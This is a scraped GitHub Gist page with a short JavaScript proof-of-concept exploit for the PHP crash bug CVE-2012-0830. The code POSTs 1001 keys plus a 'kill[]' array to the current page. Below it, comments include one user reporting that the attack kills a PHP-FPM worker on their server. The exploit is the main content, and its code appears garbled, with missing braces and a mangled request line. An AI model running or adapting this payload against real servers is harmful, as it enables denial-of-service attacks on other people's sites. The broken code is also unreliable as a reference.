Skip to content

@pilate /phpkill.js

Embed URL


Subversion checkout URL

You can clone with
Download ZIP
// Simple proof of concept for PHP bug (CVE-2012-0830) described by Stefan Esser (@i0n1c)
// Generate 1000 normal keys and one array
function createEvilObj () {
var evil_obj = {};
for (var i = 0; i < 1001; i++) {
evil_obj[i] = 1;
evil_obj['kill[]'] = 'kill';
return evil_obj;
// Serialize Javascript object into POST data
function serializeObj (obj) {
var str = [];
for(var p in obj) {
str.push(p + "=" + obj[p]);
return str.join("&");
// Run attack
function attackSite () {
var bad = serializeObj(createEvilObj());
var xhr = new XMLHttpRequest();"POST", location.href, true);
xhr.setRequestHeader('Content-Length', bad.length);

there are actually 1001 normal keys + one array there.....


My server uses nginx and proxies through PHP-FPM. For one thing, Chrome refuses line 29 (at least in the console). But this does work. A call to attackSite() results in one of the PHP instances dying:

2012/02/03 10:06:42 [error] 22018#0: *692 recv() failed (104: Connection reset by peer) while reading response header from upstream

Then it is brought back up. So I guess if I had a lot of people doing this attack even with PHP-FPM there'd be some real trouble.


It was just an observation really. Can you provide some technical details about what exactly happens inside php?
I know some php internals, but not enought for this actually......Thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.